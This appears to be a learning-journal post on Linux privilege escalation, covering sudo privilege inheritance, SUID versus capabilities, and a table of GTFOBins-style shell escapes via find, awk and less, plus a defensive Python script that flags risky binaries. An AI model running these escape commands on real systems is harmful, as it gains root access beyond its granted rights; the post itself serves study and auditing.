The Auditor's Technical Breakdown
1. Privilege Inheritance: The "Parent-Child" Rule
When a process starts a new program, the new program usually inherits its parent's user ID (UID).
- The Exploit: If you run `sudo less /etc/passwd`, the `less` process is owned by root. If you escape to a shell from inside `less` (using `!/bin/sh`), that shell is now a root shell.
2. SUID vs. Linux Capabilities
I practiced distinguishing between these two privilege delegation methods:
- SUID (`-rwsr-xr-x`): The binary runs as the owner (root) immediately.
- Capabilities (`cap_setuid+ep`): The binary starts as a normal user but has the "special power" to change its own UID to root (often exploited via Python's `os.setuid(0)`).
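As an added illustration of the section-2 distinction (example code written for this edit, not from the original post), a small Python audit helper that classifies constructed `ls -l` and `getcap -r /` lines into "runs as root immediately" versus "can raise its own UID"; the paths, sizes and capability sets are made-up sample data, and `HIGH_RISK_CAPS` is an assumed shortlist.

```python
"""Audit helper: tell SUID-root binaries apart from capability-bearing ones.
Sample input is constructed to look like `ls -l` / `getcap -r /` output."""
import re

# Assumed shortlist: capabilities that let a process change its own identity
# or bypass file permission checks; cap_setuid is the one the post mentions.
HIGH_RISK_CAPS = {"cap_setuid", "cap_setgid", "cap_dac_override", "cap_sys_admin"}

LS_SAMPLE = """\
-rwsr-xr-x 1 root root   55528 Feb  7  2022 /usr/bin/passwd
-rwxr-xr-x 1 root root  232224 Mar 23  2022 /usr/bin/find
-rwsr-xr-x 1 root root 5491680 Jun 20  2023 /usr/local/bin/python3
"""
GETCAP_SAMPLE = """\
/usr/bin/ping cap_net_raw=ep
/usr/bin/python3.8 = cap_setuid+ep
/usr/sbin/tcpdump cap_net_admin,cap_net_raw=eip
"""

def parse_ls_line(line):
    """Return (path, owner, suid). Index 3 of the mode string is the
    owner-execute slot; 's' (or 'S' when not executable) means SUID is set."""
    f = line.split()
    return f[-1], f[2], f[0][3] in "sS"

def parse_getcap_line(line):
    """Accept both libcap output styles, 'path = cap_x+ep' (older) and
    'path cap_x=ep' (newer); return (path, set_of_caps, flag_letters)."""
    line = line.strip()
    path, spec = line.split(" = ", 1) if " = " in line else line.rsplit(" ", 1)
    m = re.fullmatch(r"([\w,]+)[+=]([eip]+)", spec)
    return path, set(m.group(1).split(",")), m.group(2)

def audit(ls_text=LS_SAMPLE, getcap_text=GETCAP_SAMPLE):
    """Map path -> reason for review. SUID root runs as root from the first
    instruction; an effective high-risk capability lets a normal-user
    process raise its own UID (the os.setuid(0) case from the post)."""
    findings = {}
    for line in ls_text.splitlines():
        path, owner, suid = parse_ls_line(line)
        if suid and owner == "root":
            findings[path] = "SUID root"
    for line in getcap_text.splitlines():
        path, caps, flags = parse_getcap_line(line)
        risky = caps & HIGH_RISK_CAPS
        if risky and "e" in flags:          # only effective caps count
            findings[path] = "capability " + ",".join(sorted(risky))
    return findings
```

On a real host the same functions can be fed the output of `find / -perm -4000 -type f -exec ls -l {} +` and `getcap -r / 2>/dev/null`; anything flagged that is not on the distribution's expected list is worth a second look.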
3. Common Binary "Breakouts" (GTFOBins Style)
I audited how everyday tools can be turned into escalation vectors if they appear in `sudo -l` output:

| Binary | Method | Exploit Command |
|---|---|---|
| find | `-exec` feature | `sudo find . -exec /bin/sh \; -quit` |
| awk | `system()` call | `sudo awk 'BEGIN {system("/bin/sh")}'` |
| less | `!` shell escape | `sudo less /etc/passwd`, then `!/bin/sh` |
Follow my journey: #1HourADayJourney